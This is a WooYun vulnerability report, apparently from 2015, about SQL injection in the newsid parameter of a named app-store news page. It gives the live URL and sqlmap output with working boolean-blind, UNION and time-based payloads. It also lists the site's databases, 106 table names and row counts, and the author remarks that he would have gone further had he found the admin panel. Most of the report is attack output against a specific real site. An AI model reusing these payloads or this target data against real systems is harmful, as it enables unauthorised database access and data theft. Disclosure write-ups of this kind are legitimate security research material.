当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0105513

漏洞标题:快装app商店平台sql注入

相关厂商:快装商店

漏洞作者: boyess

提交时间:2015-04-03 18:37

修复时间:2015-05-18 18:38

公开时间:2015-05-18 18:38

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:8

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-04-03: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-05-18: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

菜鸟只为邀请码,给过吧

详细说明:

注入点:

http://news.kuaiapp.cn/list.php?newsid=258&type=2


sqlmap identified the following injection points with a total of 23 HTTP(s) requests:
---
Place: GET
Parameter: newsid
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: newsid=258 AND 5498=5498&type=2
    Type: UNION query
    Title: MySQL UNION query (NULL) - 14 columns
    Payload: newsid=258 LIMIT 1,1 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a6d79793a,0x5959434c676c43766547,0x3a6e6b633a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL#&type=2
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: newsid=258 AND SLEEP(5)&type=2
---
available databases [8]:
[*] dedeapp
[*] information_schema
[*] kuaiapp
[*] mysql
[*] performance_schema
[*] test
[*] tmp
[*] weather

漏洞证明:

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: newsid
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: newsid=258 AND 5498=5498&type=2
    Type: UNION query
    Title: MySQL UNION query (NULL) - 14 columns
    Payload: newsid=258 LIMIT 1,1 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a6d79793a,0x5959434c676c43766547,0x3a6e6b633a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL#&type=2
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: newsid=258 AND SLEEP(5)&type=2
---
available databases [8]:
[*] dedeapp
[*] information_schema
[*] kuaiapp
[*] mysql
[*] performance_schema
[*] test
[*] tmp
[*] weather
Database: kuaiapp
[106 tables]
+----------------------------+
| AccountInfo                |
| AccountInfo4PaidApp        |
| AccountInfoForAcc          |
| AdInfoAppID                |
| AdInfoList                 |
| AppAlsoBought              |
| AppAuthorInfo              |
| AppBundle                  |
| AppBundleTemp              |
| AppCategory                |
| AppComment                 |
| AppDownloadAllCDNLinks     |
| AppDownloadCount           |
| AppDownloadError           |
| AppDownloadInfo            |
| AppDownloadInfo2           |
| AppDownloadInfo3           |
| AppDownloadInfo50000       |
| AppDownloadInfo50100       |
| AppDownloadInfo60000       |
| AppDownloadInfo60100       |
| AppDownloadInfo70000       |
| AppDownloadInfo70100       |
| AppDownloadInfoForAcc      |
| AppDownloadInfoForAcc50000 |
| AppDownloadInfoForAcc50100 |
| AppDownloadInfoForAcc60000 |
| AppDownloadInfoForAcc60100 |
| AppDownloadInfoForAcc70000 |
| AppDownloadInfoForAcc70100 |
| AppDownloadInfoTemp        |
| AppDownloadInfo_pkg4       |
| AppDownloadInfo_pkg5       |
| AppDownloadInfotemp        |
| AppDownloadStatus          |
| AppDownloadStatusback      |
| AppGameAdInfo              |
| AppIconUpyun               |
| AppIdTemp                  |
| AppInfo                    |
| AppInfo4Crawl              |
| AppLikeUnLike              |
| AppNotUpdateDevice         |
| AppRank                    |
| AppRank_bak                |
| AppScreenSnapInfo          |
| AppShare                   |
| AppTag                     |
| AppTrack                   |
| ArticleInfo                |
| CmsAppRank                 |
| CmsPublisherInfo           |
| DicAppTagCategory          |
| DicCategory                |
| DicComicCategory           |
| DicDefaultComment          |
| DicRingtoneAuthor          |
| DicRingtoneCategory        |
| DicTopicCategory           |
| DicWallpaperCategory       |
| EmergingTopApps            |
| GreatApp                   |
| HotTopRingtones            |
| HotTopWallpapers           |
| LoadingAdList              |
| MissionAppList             |
| NewsClickCount             |
| NewsInfo                   |
| NewsKeyword                |
| NewsTag                    |
| PaidApp                    |
| ProblemPackageInfo         |
| RingtoneAdInfo             |
| RingtoneAdList             |
| RingtoneInfo               |
| TopAppJailed               |
| TopAppUnJailed             |
| TopApps                    |
| TopGames                   |
| TopUpdateApps              |
| TopicAdList                |
| TopicAppList               |
| TopicCategoryInfo          |
| TopicInfo                  |
| TopicList                  |
| UserFeedback               |
| UserInfo                   |
| WallpaperInfo              |
| appcatgoryid               |
| appdlcless500              |
| appneverdownload           |
| apppinyin                  |
| bundlename                 |
| iTunes_AppUrl              |
| iTunes_ImgUrl              |
| iTunes_TopAppsToDownload   |
| iTunes_TopFree             |
| iTunes_UpdateFail          |
| iTunes_apprank             |
| iphoneappids               |
| serverstatus               |
| temp_topupdateapps         |
| tempappidxx                |
| tmp_appid_down             |
| tmp_appid_download_count   |
| transcategory              |
+----------------------------+


sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: newsid
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: newsid=258 AND 5498=5498&type=2
    Type: UNION query
    Title: MySQL UNION query (NULL) - 14 columns
    Payload: newsid=258 LIMIT 1,1 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a6d79793a,0x5959434c676c43766547,0x3a6e6b633a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL#&type=2
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: newsid=258 AND SLEEP(5)&type=2
---
available databases [8]:
[*] dedeapp
[*] information_schema
[*] kuaiapp
[*] mysql
[*] performance_schema
[*] test
[*] tmp
[*] weather
Database: kuaiapp
+----------------------------+---------+
| Table                      | Entries |
+----------------------------+---------+
| AppScreenSnapInfo          | 1107052 |
| AppCategory                | 954333  |
| AppAlsoBought              | 768625  |
| AppDownloadInfoTemp        | 585139  |
| AppDownloadInfo            | 562794  |
| AppDownloadStatusback      | 488526  |
| AppDownloadInfo2           | 472617  |
| AppInfo                    | 415379  |
| iTunes_ImgUrl              | 406593  |
| AppDownloadCount           | 363641  |
| appcatgoryid               | 358874  |
| AppBundle                  | 339159  |
| AppDownloadInfo70100       | 309210  |
| AppDownloadInfo70000       | 308720  |
| AppDownloadInfo60100       | 299720  |
| AppDownloadInfo60000       | 293387  |
| AppDownloadInfo_pkg4       | 276307  |
| AppDownloadInfo50100       | 260155  |
| AppDownloadInfo50000       | 244003  |
| iTunes_apprank             | 231209  |
| bundlename                 | 217182  |
| appdlcless500              | 181186  |
| WallpaperInfo              | 180498  |
| AppDownloadInfoForAcc      | 174194  |
| tmp_appid_download_count   | 160256  |
| iTunes_UpdateFail          | 155622  |
| AppDownloadError           | 149911  |
| AppDownloadInfoForAcc70100 | 107059  |
| AppDownloadInfoForAcc70000 | 105801  |
| iphoneappids               | 96852   |
| AppDownloadInfoForAcc60100 | 93492   |
| AppDownloadInfoForAcc60000 | 88604   |
| AppAuthorInfo              | 83928   |
| AppDownloadInfoForAcc50100 | 55185   |
| iTunes_TopFree             | 51397   |
| AppDownloadInfoForAcc50000 | 49600   |
| TopAppUnJailed             | 43571   |
| AppDownloadInfo3           | 32648   |
| TopAppJailed               | 31204   |
| AppRank                    | 29469   |
| RingtoneInfo               | 19871   |
| apppinyin                  | 15843   |
| appneverdownload           | 14406   |
| UserFeedback               | 12714   |
| AppDownloadInfo_pkg5       | 9899    |
| AppInfo4Crawl              | 3948    |
| TopicAppList               | 3230    |
| GreatApp                   | 2509    |
| TopUpdateApps              | 1932    |
| temp_topupdateapps         | 1672    |
| DicRingtoneAuthor          | 1167    |
| AppTag                     | 1122    |
| MissionAppList             | 1108    |
| tempappidxx                | 681     |
| TopGames                   | 600     |
| EmergingTopApps            | 535     |
| ArticleInfo                | 387     |
| PaidApp                    | 366     |
| TopicCategoryInfo          | 356     |
| TopicList                  | 317     |
| AdInfoAppID                | 299     |
| TopicInfo                  | 230     |
| NewsClickCount             | 182     |
| NewsInfo                   | 182     |
| TopApps                    | 157     |
| NewsKeyword                | 135     |
| DicWallpaperCategory       | 84      |
| AdInfoList                 | 72      |
| DicCategory                | 72      |
| RingtoneAdList             | 60      |
| iTunes_AppUrl              | 58      |
| LoadingAdList              | 49      |
| iTunes_TopAppsToDownload   | 40      |
| ProblemPackageInfo         | 32      |
| tmp_appid_down             | 31      |
| AccountInfoForAcc          | 30      |
| AppShare                   | 28      |
| DicRingtoneCategory        | 28      |
| transcategory              | 24      |
| DicComicCategory           | 19      |
| CmsPublisherInfo           | 13      |
| DicAppTagCategory          | 12      |
| DicTopicCategory           | 10      |
| AccountInfo                | 9       |
| HotTopWallpapers           | 8       |
| AppTrack                   | 7       |
| AppGameAdInfo              | 6       |
| NewsTag                    | 6       |
| AccountInfo4PaidApp        | 4       |
| AppRank_bak                | 4       |
| AppNotUpdateDevice         | 2       |
| CmsAppRank                 | 2       |
| HotTopRingtones            | 2       |
| RingtoneAdInfo             | 2       |
| serverstatus               | 1       |
+----------------------------+---------+


没找到后台,不然可以进行下一步,嘿嘿嘿

修复方案:

过滤吧

版权声明:转载请注明来源 boyess@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝